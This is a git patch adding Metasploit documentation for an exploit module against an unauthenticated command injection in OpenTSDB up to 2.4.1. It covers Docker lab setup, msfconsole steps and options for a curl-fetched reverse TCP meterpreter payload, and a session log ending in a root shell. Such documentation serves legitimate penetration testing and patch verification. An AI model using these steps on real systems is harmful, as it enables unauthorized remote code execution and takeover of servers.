From 18103b032d300e2aab3930c1b856c6bf321598a6 Mon Sep 17 00:00:00 2001 From: Simon Janusz Date: Fri, 8 Sep 2023 16:08:18 +0100 Subject: [PATCH] Add docs for opentsdb_key_cmd_injection --- .../linux/http/opentsdb_key_cmd_injection.md | 152 ++++++++++++++++++ 1 file changed, 152 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/opentsdb_key_cmd_injection.md diff --git a/documentation/modules/exploit/linux/http/opentsdb_key_cmd_injection.md b/documentation/modules/exploit/linux/http/opentsdb_key_cmd_injection.md new file mode 100644 index 000000000000..2cd02d2fb506 --- /dev/null +++ b/documentation/modules/exploit/linux/http/opentsdb_key_cmd_injection.md @@ -0,0 +1,152 @@ +## Vulnerable Application +This module exploits an unauthenticated command injection vulnerability in OpenTSDB +through 2.4.1 (CVE-2023-36812/CVE-2023-25826) in order to achieve remote code execution as the root user. + +The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.1 or lower, +the module performs additional checks to obtain the configured metrics and aggregators. +It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. +As part of this request, the key is set to the payload, which will then be executed by the target if the latter is vulnerable. + +This module has been successfully tested against OpenTSDB version 2.4.1 running in Docker. + +## Installation Information +### Manual Installation +For a manual installation, you can follow the official installation instructions [here](http://opentsdb.net/docs/build/html/installation.html). +This can be annoying though, so using Docker is recommended. + +### Docker Installation +For version 2.4.0, you can use the vulhub Docker image and follow the installation instructions [here](https://github.com/vulhub/vulhub/tree/master/opentsdb/CVE-2020-35476). +That image was created for CVE-2020-35476, an older vulnerability in OpenTSDB through 2.4.0. + +For any other version, you could leverage the vulhub image for OpenTSDB 2.4.0 and edit it to install the version you want. This approach was followed for 2.4.1. + +Grab the vulhub OpenTSDB 2.4.0 `Dockerfile` and `docker-entrypoint.sh` from [here](https://github.com/vulhub/vulhub/tree/master/base/opentsdb/2.4.0) and store them in a dedicated directory. +In the `Dockerfile`, replace all instances for `2.4.0` with your desired version, e.g. `2.4.1`. +No edits are necessary for `docker-entrypoint.sh`. +Create a `docker-compose.yml` file with the following contents: +```yml +version: '2' +services: + opentsdb: + build: ./path-to-your-dockerfile-directory + ports: + - "4242:4242" +``` + +Example file structure: +``` +wynter@wynter-pc:~/dev/opentsdb$ ls -lR +.: +total 8 +-rw-rw-r-- 1 wynter wynter 86 Sep 1 10:55 docker-compose.yml +drwxrwxr-x 2 wynter wynter 4096 Sep 1 10:54 docker_file + +./docker_file: +total 8 +-rw-rw-r-- 1 wynter wynter 927 Sep 1 10:54 Dockerfile +-rw-rw-r-- 1 wynter wynter 359 Sep 1 10:35 docker-entrypoint.sh + +wynter@wynter-pc:~/dev/opentsdb$ cat docker-compose.yml +version: '2' +services: + opentsdb: + build: ./docker_file + ports: + - "4242:4242" +``` + +Finally, build and run the image via `docker-compose` by running the below command in the directory with you `docker-compose.yml` file: +```bash +docker-compose up -d +``` + +After a few seconds, OpenTSDB will be available on port 4242. No additional configuration is required. + +## Verification Steps +1. Start `msfconsole` +1. Do: `use exploit/linux/http/opentsdb_key_cmd_injection` +1. Do: `set RHOSTS [IP]` +1. Do: `set LHOST [IP]` +1. Do: `set SRVHOST [IP]` +1. Do: `set FETCH_SRVHOST [IP]` +1. Do: `exploit` + +## Options +### TARGETURI +The base path to OpenTSDB. The default value is `/`. + +## Targets +``` +Id Name +-- ---- +0 Linux +``` + +## Scenarios +### OpenTSDB 2.4.1 - Linux target +``` +msf6 exploit(linux/http/opentsdb_key_cmd_injection) > options + +Module options (exploit/linux/http/opentsdb_key_cmd_injection): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 4242 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI / yes The base path to OpenTSDB + URIPATH no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + + + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. + SRVPORT 8080 yes The local port to listen on. + + +Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) + FETCH_DELETE false yes Attempt to delete the binary after execution + FETCH_FILENAME yr no Name to use on remote system when storing payload; cannot contain spaces. + FETCH_SRVHOST no Local IP to use for serving payload + FETCH_SRVPORT 8081 yes Local port to use for serving payload + FETCH_URIPATH no Local URI to use for serving payload + FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces. + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Linux + + + +View the full module info with the info, or info -d command. + +msf6 exploit(linux/http/opentsdb_key_cmd_injection) > run RHOSTS=127.0.0.1 LHOST=192.168.112.1 + +[*] Started reverse TCP handler on 192.168.112.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. The target is OpenTSDB version 2.4.1 +[*] Identified 3 configured metrics. Using metric sys.cpu.idle +[*] Identified 35 configured aggregators. Using aggregator none +[*] Executing the payload +[*] Sending stage (3045380 bytes) to 192.168.112.1 +[*] Meterpreter session 9 opened (192.168.112.1:4444 -> 192.168.112.1:61423) at 2023-09-08 14:32:05 +0100 + +meterpreter > getuid +Server username: root +meterpreter > pwd +/usr/share/opentsdb +```